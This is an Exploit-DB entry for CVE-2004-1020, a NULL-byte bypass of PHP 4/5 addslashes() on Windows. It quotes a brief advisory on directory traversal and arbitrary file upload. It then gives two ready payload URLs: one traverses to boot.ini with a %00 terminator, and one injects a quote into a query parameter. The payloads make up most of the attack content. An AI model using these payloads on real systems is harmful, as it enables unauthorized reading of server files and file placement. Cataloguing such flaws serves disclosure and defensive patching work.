PHP 4/5 addslashes NULL Byte Bypass

2004-12-16T00:00:00
ID EDB-ID:24985
Type exploitdb
Reporter Daniel Fabian
Modified 2004-12-16T00:00:00

Description

PHP 4/5 addslashes() NULL Byte Bypass. CVE-2004-1020. Remote exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/11981/info

PHP4 and PHP5 are reported prone to multiple remotely exploitable vulnerabilities. These issue result from insufficient sanitization of user-supplied data. A remote attacker may carry out directory traversal attacks to disclose arbitrary files and upload files to arbitrary locations.

It is reported that these vulnerabilities may only be exploited on Windows.


http://www.example.com/phpscript.php?whatever=../../../../boot.ini%00
http://www.example.com/phpscript.php?whatever=..\'file.ext